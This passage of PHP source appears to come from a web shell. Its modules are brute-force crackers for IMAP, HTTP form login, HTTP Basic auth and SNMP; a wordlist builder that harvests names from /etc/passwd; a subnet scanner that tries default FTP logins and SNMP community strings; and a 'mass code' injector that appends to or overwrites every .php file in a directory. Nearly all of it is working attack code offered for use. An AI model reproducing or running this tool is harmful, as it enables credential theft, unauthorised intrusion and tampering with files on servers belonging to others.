6664if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
6665$target=$_REQUEST['target'];
6666$type=$_REQUEST['combo'];
6667$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
6668$dictionary=fopen($_REQUEST['dictionary'],'r');
6669if ($dictionary){
6670echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
6671while(!feof($dictionary)){
6672if($type){
6673$combo=trim(fgets($dictionary)," \n\r");
6674$user=substr($combo,0,strpos($combo,':'));
6675$pass=substr($combo,strpos($combo,':')+1);
6676}else{
6677$pass=trim(fgets($dictionary)," \n\r");
6678}
6679$imap=imaplogiN($target,$user,$pass);
6680if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{
6681if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}}
6682flusheR();
6683}
6684echo "<br/>Done</font>";
6685fclose($dictionary);
6686}
6687else{
6688echo "$errorbox Can not open dictionary.$et";
6689}
6690}else
6691{
6692echo "<center>IMAP cracker:$crack</center>";
6693}
6694print ('<center><table border="0" style="border-collapse: collapse" bordercolor= "#282828" width="40%"><tbody><form method="POST" name="form" action=""><tr><td width="40%" bgcolor="#333333">IMAP cracker:</td><td bgcolor="#333333"></td></tr><tr><td width="20%" bgcolor="#666666">Dictionary:</td><td bgcolor="#666666"><input type="text" name="dictionary" size="35" \></td></tr><tr><td width="20%" bgcolor="#808080" \>Dictionary type:</td><td bgcolor="#808080"><input type="radio" name="combo" checked="" value="0" onclick="document.form.user.disabled = false;" style="border-width:1px;background-color:#808080;" \>Simple (P)<input type="radio" value="1" name="combo" onclick="document.form.user.disabled = true;" style="border-width:1px;background-color:#808080;">Combo (U:P)</td></tr><tr><td width="20%" bgcolor="#666666" \>Username:</td><td bgcolor="#666666"><input type="text" size="35" value="root" name="use" \></td></tr><tr><td width="20%" bgcolor="#808080">Server:</td><td bgcolor="#808080"><input type="text" name="target" value="localhost" size="35" \></td></tr><tr><td width="20%" bgcolor="#666666"></td><td bgcolor="#666666" align="right"><input type="submit" value="Start" \></td></tr></form></tbody></table></center>');
6695
6696}
6697
6698if ($act == "dic")
6699{
6700global $errorbox,$windows,$footer,$t,$et,$hcwd;
6701if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0;
6702if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){
6703$min = $_REQUEST['min'];
6704$max = $_REQUEST['max'];
6705if($max<$min)die($errorbox ."Bad input!$et". $footer);
6706$s =$w="";
6707$out = $_REQUEST['output'];
6708$r = ($_REQUEST['range']=='a' )?'a':'A';
6709if ($_REQUEST['range']==0) $r=0;
6710for($i=0;$i<$min;$i++) $s.=$r;
6711$dic = fopen($out,'a');
6712if(is_nan($r)){
6713while(strlen($s)<=$max){
6714$w = $s;
6715if($combo)$w="$w:$w";
6716fwrite($dic,$w."\n");
6717$s++;}
6718}
6719else{
6720while(strlen($w)<=$max){
6721$w =(string)str_repeat("0",($min - strlen($s))).$s;
6722if($combo)$w="$w:$w";
6723fwrite($dic,$w."\n");
6724$s++;}
6725}
6726fclose($dic);
6727echo "<font color=yellow>Done</font>";
6728}
6729if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){
6730$input=fopen($_REQUEST['input'],'r');
6731if (!$input){
6732if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
6733else{
6734$input=explode("\n",shelL("cat $input"));
6735$output=fopen($_REQUEST['output'],'w');
6736if ($output){
6737foreach ($input as $in){
6738$user = $in;
6739$user = trim(fgets($in)," \n\r");
6740if (!strstr($user,":"))continue;
6741$user=substr($user,0,(strpos($user,':')));
6742if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
6743}
6744fclose($input);fclose($output);
6745echo "<font color=yellow>Done</font>";
6746}
6747}
6748}
6749else{
6750$output=fopen($_REQUEST['output'],'w');
6751if ($output){
6752while (!feof($input)){
6753$user = trim(fgets($input)," \n\r");
6754if (!strstr($user,":"))continue;
6755$user=substr($user,0,(strpos($user,':')));
6756if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
6757}
6758fclose($input);fclose($output);
6759echo "<font color=yellow>Done</font>";
6760}
6761else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
6762}
6763}elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){
6764$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);
6765if($combo && $res){
6766$file=file($_REQUEST['output']);
6767$output=fopen($_REQUEST['output'],'w');
6768foreach ($file as $v)fwrite($output,"$v:$v\n");
6769fclose($output);
6770}
6771echo "<font color=yellow>Done</font>";
6772}else{
6773$temp=whereistmP();
6774echo "<center>
6775<table>
6776<tr valign=top><td>
6777<table>Wordlist generator:<form method=\"POST\">
6778<tr>
6779<td width=\"20%\" bgcolor=\"#666666\">Range:</td>
6780<td bgcolor=\"#666666\">
6781<select name=range>
6782<option value=a>a-z</option>
6783<option value=Z>A-Z</option>
6784<option value=0>0-9</option></select>
6785</td></tr>
6786<tr>
6787<td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td>
6788<td bgcolor=\"#808080\">
6789<select name=min>
6790<option value=1>1</option>
6791<option value=2>2</option>
6792<option value=3>3</option>
6793<option value=4>4</option>
6794<option value=5>5</option>
6795<option value=6>6</option>
6796<option value=7>7</option>
6797<option value=8>8</option>
6798<option value=9>9</option>
6799<option value=10>10</option>
6800</select>
6801</td></tr>
6802<tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td>
6803<td bgcolor=\"#666666\">
6804<select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select>
6805</td></tr>
6806<tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>
6807<tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr>
6808<tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table>
6809</td><td>
6810<table>Grab dictionary:
6811<form method=\"POST\">
6812<tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td>
6813<td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr>
6814<tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td>
6815<td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>
6816<tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr>
6817<tr>
6818<td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form>
6819</table>
6820</td><td>
6821<table>Download dictionary:<form method=\"POST\">
6822<tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr>
6823<tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>
6824<tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr>
6825<tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table>
6826</td>
6827</tr></table>
6828</center> ";}
6829}
6830
6831if ($act == "htmlform")
6832{
6833global $errorbox,$footer,$et,$hcwd;
6834if(!empty($_REQUEST['start'])){
6835$url=$_REQUEST['target'];
6836$uf=$_REQUEST['userf'];
6837$pf=$_REQUEST['passf'];
6838$sf=$_REQUEST['submitf'];
6839$sv=$_REQUEST['submitv'];
6840$method=$_REQUEST['method'];
6841$fail=$_REQUEST['fail'];
6842$dic=$_REQUEST['dictionary'];
6843$type=$_REQUEST['combo'];
6844$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
6845if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer");
6846$dictionary=fopen($dic,'r');
6847echo "<font color=blue>Cracking started...<br>";
6848while(!feof($dictionary)){
6849if($type){
6850$combo=trim(fgets($dictionary)," \n\r");
6851$user=substr($combo,0,strpos($combo,':'));
6852$pass=substr($combo,strpos($combo,':')+1);
6853}else{
6854$pass=trim(fgets($dictionary)," \n\r");
6855}
6856$url.="?$uf=$user&$pf=$pass&$sf=$sv";
6857$res=check_urL($url,$method,$fail,12);
6858if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;}
6859flusheR();
6860}
6861fclose($dictionary);
6862echo "Done!</font><br>";
6863}
6864else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>";
6865}
6866
6867if ($act == "basicauth")
6868{
6869global $errorbox,$et,$t,$crack,$hcwd;
6870if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
6871$data='';
6872$method=($_REQUEST['method'])?'POST':'GET';
6873if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));}
6874spliturL($_REQUEST['target'],$host,$page);
6875$type=$_REQUEST['combo'];
6876$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
6877if($method='GET')$page.=$data;
6878$dictionary=fopen($_REQUEST['dictionary'],'r');
6879echo "<font color=blue>";
6880while(!feof($dictionary)){
6881if($type){
6882$combo=trim(fgets($dictionary)," \n\r");
6883$user=substr($combo,0,strpos($combo,':'));
6884$pass=substr($combo,strpos($combo,':')+1);
6885}else{
6886$pass=trim(fgets($dictionary)," \n\r");
6887}
6888$so=fsockopen($host,80,$en,$es,5);
6889if(!$so){echo "$errorbox Can not connect to host$et";break;}
6890else{
6891$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass");
6892if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data);
6893$packet.="\r\n\r\n";
6894$packet.=$data;
6895fputs($so,$packet);
6896$res=substr(fgets($so),9,2);
6897fclose($so);
6898if($res=='20')echo "U: $user P: $pass</br>";
6899flusheR();
6900}
6901}
6902echo "Done!</font>";
6903}else echo "<center><form method=\"POST\" name=form><table><tr><td bgcolor=\"#333333\"><font color=silver>
6904HTTP Auth cracker:</font></td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
6905}
6906
6907if ($act == "snmp")
6908{
6909global $t,$et,$errorbox,$crack,$hcwd;
6910if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
6911$target=$_REQUEST['target'];
6912$dictionary=fopen($_REQUEST['dictionary'],'r');
6913if ($dictionary){
6914echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
6915while(!feof($dictionary)){
6916$com=trim(fgets($dictionary)," \n\r");
6917$res=snmpchecK($target,$com,2);
6918if($res)echo "$com<br>";
6919flusheR();
6920}
6921echo "<br>Done</font>";
6922fclose($dictionary);
6923}
6924else{
6925echo "$errorbox Can not open dictionary.$et";
6926}
6927}
6928 echo "<center><table width=\"50%\">SNMP cracker:<form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
6929}
6930
6931
6932
6933if ($act == "scanner")
6934{
6935global $hcwd;
6936if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1";
6937$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;
6938if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){
6939$target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0;
6940echo "<font color=yellow>Port scanning started against ".htmlspecialchars($target).":<br>";
6941$start=time();
6942for($i=$from;$i<=$to;$i++){
6943if($tcp){
6944if (checkthisporT($target,$i,$timeout)){
6945$nu++;
6946$ser="";
6947if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")";
6948echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>";
6949}
6950}
6951if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";}
6952flusheR();
6953}
6954$time=time()-$start;
6955echo "Done! ($time seconds)</font>";
6956}
6957elseif (!empty($_REQUEST['securityscanner'])){
6958echo "<font color=yellow>";
6959$start=time();
6960$from=$_REQUEST['from'];
6961$to=(int)$_REQUEST['to'];
6962$timeout=(int)$_REQUEST['timeout'];
6963$f = substr($from,strrpos($from,".")+1);
6964$from = substr($from,0,strrpos($from,"."));
6965if(!empty($_REQUEST['httpscanner'])){
6966echo "Loading webserver bug list...";
6967flusheR();
6968$buglist=whereistmP().DIRECTORY_SEPARATOR.namE();
6969$dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist);
6970if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! scanning started without webserver security testing...<br><br>";
6971flusheR();
6972}else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";}
6973for($i=$f;$i<=$to;$i++){
6974$output=0;
6975$ip="$from.$i";
6976if(!empty($_REQUEST['nslookup'])){
6977$hn=gethostbyaddr($ip);
6978if($hn!=$ip)echo "$ip [$hn]<br>";}
6979flusheR();
6980if(!empty($_REQUEST['ipscanner'])){
6981$port=$_REQUEST['port'];
6982if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port;
6983$open=$ser="";
6984foreach($p as $po){
6985$scan=checkthisporT($ip,$po,$timeout);
6986if ($scan){
6987$ser="";
6988if($ser=getservbyport($po,"tcp"))$ser="($ser)";
6989$open.=" $po$ser ";
6990}
6991}
6992if($open){echo "$ip) Open ports:$open<br>";$output=1;}
6993flusheR();
6994}
6995if(!empty($_REQUEST['httpbanner'])){
6996$res=get_sw_namE($ip,$timeout);
6997if($res){
6998echo "$ip) Webserver software: ";
6999if($res==-1)echo "Unknow";
7000else echo $res;
7001echo "<br>";
7002$output=1;
7003}
7004flusheR();
7005}
7006if(!empty($_REQUEST['httpscanner'])){
7007if(checkthisporT($ip,80,$timeout) && !empty($file)){
7008$admin=array('/admin/','/adm/');
7009$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');
7010$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');
7011$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');
7012foreach ($file as $v){
7013$vuln=array();
7014$v=trim($v);
7015if(!$v || $v{0}=='#')continue;
7016$v=str_replace('","','^',$v);
7017$v=str_replace('"','',$v);
7018$vuln=explode('^',$v);
7019$page=$cqich=$nukech=$adminch=$userch=$vuln[1];
7020if(strstr($page,'@CGIDIRS'))
7021foreach($cgi as $cg){
7022$cqich=str_replace('@CGIDIRS',$cg,$page);
7023$url="http://$ip$cqich";
7024$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
7025if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
7026flusheR();
7027}
7028elseif(strstr($page,'@ADMINDIRS'))
7029foreach ($admin as $cg){
7030$adminch=str_replace('@ADMINDIRS',$cg,$page);
7031$url="http://$ip$adminch";
7032$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
7033if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
7034flusheR();
7035}
7036elseif(strstr($page,'@USERS'))
7037foreach ($users as $cg){
7038$userch=str_replace('@USERS',$cg,$page);
7039$url="http://$ip$userch";
7040$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
7041if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
7042flusheR();
7043}
7044elseif(strstr($page,'@NUKE'))
7045foreach ($nuke as $cg){
7046$nukech=str_replace('@NUKE',$cg,$page);
7047$url="http://$ip$nukech";
7048$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
7049if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
7050flusheR();
7051}
7052else{
7053$url="http://$ip$page";
7054$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
7055if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
7056flusheR();
7057}
7058}
7059}
7060}
7061if(!empty($_REQUEST['smtprelay'])){
7062if(checkthisporT($ip,25,$timeout)){
7063$res='';
7064$res=checksmtP($ip,$timeout);
7065if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR();
7066}
7067}
7068if(!empty($_REQUEST['snmpscanner'])){
7069if(checkthisporT($ip,161,$timeout,1)){
7070$com=$_REQUEST['com'];
7071$coms=$res="";
7072if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com;
7073foreach ($c as $v){
7074$ret=snmpchecK($ip,$v,$timeout);
7075if($ret)$coms .=" $v ";
7076}
7077if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;}
7078flusheR();
7079}
7080}
7081if(!empty($_REQUEST['ftpscanner'])){
7082if(checkthisporT($ip,21,$timeout)){
7083$usps=explode(',',$_REQUEST['userpass']);
7084foreach ($usps as $v){
7085$user=substr($v,0,strpos($v,':'));
7086$pass=substr($v,strpos($v,':')+1);
7087if($pass=='[BLANK]')$pass='';
7088$ftp=@ftp_connect($ip,21,$timeout);
7089if ($ftp){
7090if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";}
7091}
7092flusheR();
7093}
7094}
7095}
7096if($output)echo "<hr size=1 noshade>";
7097flusheR();
7098}
7099$time=time()-$start;
7100echo "Done! ($time seconds)</font>";
7101if(!empty($buglist))unlink($buglist);
7102}
7103else{
7104$chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>";
7105echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";
7106$host = substr($host,0,strrpos($host,"."));
7107echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>";
7108}
7109}
7110
7111if ($act == "masscode")
7112{
7113if(isset($_POST['dir']) &&
7114 $_POST['dir'] != '' &&
7115 isset($_POST['filetype']) &&
7116 $_POST['filetype'] != '' &&
7117 isset($_POST['mode']) &&
7118 $_POST['mode'] != '' &&
7119 isset($_POST['message']) &&
7120 $_POST['message'] != ''
7121 )
7122 {
7123 $dir = $_POST['dir'];
7124 $filetype = $_POST['filetype'];
7125 $message = $_POST['message'];
7126
7127 $mode = "a"; //default mode
7128
7129
7130 // Modes Begin
7131
7132 if($_POST['mode'] == 'Apender')
7133 {
7134 $mode = "a";
7135 }
7136 if($_POST['mode'] == 'Overwriter')
7137 {
7138 $mode = "w";
7139 }
7140
7141 if($handle = opendir($dir))
7142 {
7143 ?>
7144 Overwritten Files :-
7145 <ul style="padding: 5px;" >
7146 <?php
7147 while(($file = readdir($handle)) !== False)
7148 {
7149 if((preg_match("/$filetype".'$'.'/', $file , $matches) != 0) && (preg_match('/'.$file.'$/', $self , $matches) != 1))
7150 {
7151 ?>
7152 <li class="file"><a href="<?php echo "$self?open=$dir$file"?>"><?php echo $file; ?></a></li>
7153 <?php
7154 echo "\n";
7155 $fd = fopen($dir.$file,$mode);
7156 if (!$fd) echo "<p><font color=red>Permission Denied</font></p>"; break;
7157 fwrite($fd,$message);
7158 }
7159 }
7160 ?>
7161 </ul>
7162 <?php
7163 }
7164 }
7165 else
7166 {
7167 ?>
7168 <table >
7169
7170 <form method='POST'>
7171 <input type="hidden" name="injector"/>
7172 <tr>
7173 <td class="title">
7174 Directory
7175 </td>
7176 <td>
7177 <input name="dir" value="<?php echo getcwd().$SEPARATOR; ?>" />
7178 </td>
7179 </tr>
7180 <tr>
7181 <td class="title">
7182 Mode
7183 </td>
7184 <td>
7185 <select style="width: 125px;" name="mode">
7186 <option value="Apender">Apender</option>
7187 <option value="Overwriter">Overwriter</option>
7188 </select>
7189 </td>
7190 </tr>
7191 <tr>
7192 <td class="title">
7193 File Type
7194 </td>
7195 <td>
7196 <input type="text" class="cmd" name="filetype" value=".php" onblur="if(this.value=='')this.value='.php';" />
7197 </td>
7198 </tr>
7199
7200
7201 <tr>
7202 <td colspan="2">
7203 <textarea name="message" cols="110" rows="10" class="cmd">I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea>
7204 </td>
7205 </tr>
7206
7207
7208 <tr>
7209 <td rowspan="2">
7210 <input style="margin : 20px; margin-left: 315px; padding : 10px; width: 100px;" type="submit" value="Inject :D"/>
7211 </td>
7212 </tr>
7213 </form>
7214 </table>
7215 <?php
7216 }
7217}
7218
7219}
7220else
7221
7222{
7223
7224 @ob_clean();
7225
7226 $images = array(
7227
7228"arrow_ltr"=>
7229
7230"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
7231
7232"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
7233
